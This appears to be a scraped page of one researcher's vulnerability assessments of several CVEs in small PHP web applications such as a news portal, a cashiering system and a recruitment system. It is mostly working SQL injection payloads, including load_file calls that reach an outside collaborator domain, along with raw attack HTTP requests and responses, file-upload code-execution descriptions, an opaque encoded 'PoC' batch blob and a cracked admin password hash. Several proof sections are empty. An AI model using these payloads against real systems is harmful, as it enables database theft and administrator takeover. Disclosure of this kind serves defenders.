Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
       <meta name="description" content="Learning Management System">
       <meta name="keywords" conte
...[SNIP]...
<ul     id="da-thumbs" class="da-thumbs">
                                        You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4

Reproduce:

Proof and Exploit:

M0r3:

Proof and Explot:

1

nu11secur1ty assessed CVE-2021-37808

December 02, 2021 7:12pm UTC (5 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-37808

Vendor

Description:

The searchtitle parameter from News Portal Project 3.1 appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\wddcdzjvtmxtfkwxdw5gwdmxpovhj99x00osbiz7.nu11secur1tycollaborator.net\lni’))+’ was submitted in the searchtitle parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can be retrieving sensitive information
for all accounts of this system, and he can manipulate them!
STATUS: Critical and awful.

Reproduce:

Proof and Exploit:

1

nu11secur1ty assessed CVE-2021-41492

December 01, 2021 3:43pm UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-41492

Software

Description:

The username parameter from Sourcecodester Simple Cashiering System (POS) 1.0 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can retrieve sensitive information from the database for all users, and also administrator account!

MySQL Request:

POST /cashiering/Actions.php?a=login HTTP/1.1
Host: 192.168.10.63
Origin: http://192.168.10.63
Cookie: PHPSESSID=bgtkft2eqoj6s4ajhp414erka3
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.63/cashiering/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37

username=tralala'&password=@32e23eq3r

MySQL Response:

HTTP/1.1 200 OK
Date: Wed, 01 Dec 2021 12:06:18 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: &quot;5a72f9fa6edacd9d71b9e2dc9d1a9ecc&quot; in <b>C:\xampp\htdocs\cashiering\Actions.php</b> on line <b>1
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\cashiering\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\cashiering\Actions.php(233): Actions-&gt;login()
#1 {main}
thrown in <b>

Reproduce:

Proof and explot:

BR nu11secur1ty

1

nu11secur1ty assessed CVE-2021-33470

November 30, 2021 7:11pm UTC (5 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CTMS

Vendor

Description:

The parameters username and contactno from COVID 19 Testing Management System (CTMS) 1.0 are vulnerable to Remote Code SQL injection attacks.
Test REQUESTS: Payloads 27325265’ or 8079=8079— and 35638130’ or 9157=9162—.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can execute a Remote Code Injection to override the current password for the admin account directly from the broadcast networks!
Status Critical and awful.
BR nu11secur1ty

Reproduce:

Proof:

1

nu11secur1ty assessed CVE-2021-41648

November 22, 2021 11:55am UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.

Reproduce:

Proof and Exploit:

Action:

1

nu11secur1ty assessed CVE-2021-41675

November 21, 2021 10:22am UTC (5 months ago)•Edited 5 months ago

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Vulnerable in default configuration

Technical Analysis

CVE-2021-41675

Vendor

Author and redevelopment of the PoC

nu11secur1ty

First cool ;) Idea:

Thank you, dear friend!
Janik Wehrli

Description:

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester E-Negosyo System 1.0 in /admin/produts/controller.php via the do Insert function, which validates images with getImageSizei… More about the function: https://www.php.net/manual/en/function.getimagesize.php The attacker can deploy malicious RCE files bypassing this function, and after that, he can use the directory traversal method, to navigate to the /uploaded_photos/ directory which is another and actual problem of this system. After the problem, which is – no sanitizing of the function “(getimagesize())” on this system, the attacker can execute the malicious RCE code, and then he can retrieve all sensitive information about the App on this server, and all architecture of this server. CONCLUSION: There is no proper disinfection of “(getimagesize())” function, and correctly protecting the directory /uploaded_photos/.

Reproduce:

Proof and exploit:

1

nu11secur1ty assessed CVE-2021-42671

November 20, 2021 5:07pm UTC (5 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Difficult to patch Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration Requires user interaction Vulnerable in uncommon configuration

Technical Analysis

CVE-2021-42671

Vendor

Description:

An RCE vulnerability exists in Engineers Online Portal 1.0 when the malicious user creates an account with a malicious purpose.
When the user is already with the account he can upload a malicious RCE exploit without any problem – no sanitizing.
After uploading this RCE malicious file, he can navigate by using the directory traversal method, which is another problem of this system, then he can execute the malicious code. Conclusion: Status awful and critical.

Reproduce:

Proof and exploit:

1

nu11secur1ty assessed CVE-2021-43141

November 20, 2021 8:47am UTC (6 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-2021-43141

Vendor

Description:

Cross-Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application and users_application.
The attacker can use SQL – Injection bypass Authentication method to log in to the admin account of the system and then he can exploit this account by using XSS-Stored to attack and exploit the account, and then he can use remote requests to hijack PHPSESSID and can exploit this account and users into it by using an XSS-Stored method!
Conclusion: The status of this system is CRITICAL and awful, and this must be stopped immediately for distribution!

Action:

Reproduce:

Proof and exploit:

1

nu11secur1ty assessed CVE-nu11-20-100121

November 19, 2021 2:35pm UTC (6 months ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

CVE-nu11-20-100121

CVE-2021-41931

Description of vulnerability:

The Company’s Recruitment Management System (by: oretnom23) in id=2 of the parameter from view_vacancy app on-page appears to be vulnerable to SQL Injection – Stealing the Password Hashes attacks.
The payloads 19424269’ or ‘1309’=‘1309 and 39476597’ or ‘2917’=‘2923 were each submitted in the id parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Description of the exploit:

Exploit Title: Recruitment Management System is vulnerable to MyQSL injection - Stealing the Password Hashes attacks.
Date: 2021-10-01
Exploit Author: nu11secur1ty
Vendor Homepage: https://www.sourcecodester.com/user/257130/activity
Software Link: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
Version: (by: oretnom23) dev

MySQL Request:

GET /employment_application/?page=view_vacancy&id=219424269'%20or%20'1309'%3d'1309 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=oku6deve0oo3qbrbbprp5jnb6j
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/employment_application/?page=vacancy
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Respond

HTTP/1.1 200 OK
Date: Fri, 01 Oct 2021 09:37:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12044

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
<h5 class="card-title fw-bold wow">Sample Vacancy 101</h5>
...[SNIP]...
<div class="fs-5 ps-4">IT Depatment</div>
...[SNIP]...
<div class="fs-5 ps-4">Jr. Web Developer</div>
...[SNIP]...
<span class="badge bg-success rounded-pill">3</span>
...[SNIP]...
<div class="fs-6 ps-4"><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pretium vel tortor id semper. Donec ultrices sagittis euismod. Pellentesque ultrices lectus in suscipit ultricies. Morbi eget erat enim. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Mauris nec ex non lectus interdum interdum sit amet in lacus. Maecenas eu nulla nec nisi bibendum euismod in a nibh. Nullam quis gravida turpis. Donec hendrerit sagittis arcu quis mollis. Quisque pretium est in turpis pulvinar, nec pellentesque sem sagittis. Quisque ultrices molestie risus id varius. Vivamus sed efficitur erat, quis cursus massa. In in varius purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Quisque eget cursus nunc. Aenean semper neque velit, quis ullamcorper justo efficitur id.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;"><b>Qualification:</b></p><ul><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 1</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 2</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 3<br></li></ul><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">In ut ligula et erat ullamcorper imperdiet. Pellentesque vitae justo facilisis, gravida sapien quis, mollis urna. Proin eu aliquam justo. Cras malesuada, nunc ac varius dapibus, orci ante pretium elit, non porta augue lectus sit amet orci. Ut ac porta mauris. Donec venenatis nisi sit amet massa sollicitudin lobortis. Quisque eros lectus, blandit et dapibus eu, gravida a risus. Vivamus sodales rutrum purus ac dictum. Integer massa velit, facilisis at leo vitae, semper congue mi. Vivamus bibendum sem eget porta tristique. Nunc nisl odio, pellentesque nec pellentesque quis, consequat ut neque. Sed elementum vel augue malesuada ultrices. Nullam dapibus mattis leo vitae laoreet.</p></div>
...[SNIP]...

PoC r0n1n.bat

XvL5vVDYAJj4HVMbIvtHb6RMoVRD9iM5nNOr2XqhOpGam2eUj8ytNzzaJyLI+Pv0MtFALO1RllnynHT6Odr38k3iyKIyTN+FszTfPrdRuHJlBKLn79q7ClWCQwWKYtTOXSPGgaKHIyxQz6RR+8JV9FQMmUjHtus7ENGSGsbL8RJIHfCVRqH6xb8tpXPJILc4gIn7mseYxiLp8x7s5Q4QhGXnHvhrsj7lE6jqTQmphumt3gQmBvxlhQILxBKGSG5ZxoVleq4xR/aUiivIiejShajuYChPXHzDF3g/e41aX4BpHa3iQsf390FP+m+FKrpeNPSZUcQAy48EwgEdHNz04yblTBo5sS5ywV5ej+3ZmiwVALH6MSvnLG3mTqglNXSc4+/MkxxmuPrn0Xbe5EZnuGjZTAnWFqfzQJjwy3A8gI2AQWH+RAR2CdWCRzr6hB0rFYJlPrFOKWAgpPB92HfUsQ==

Decrypt of the password

The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

Reproduce:

Proof:

Music: – UKF

BR @nu11secur1ty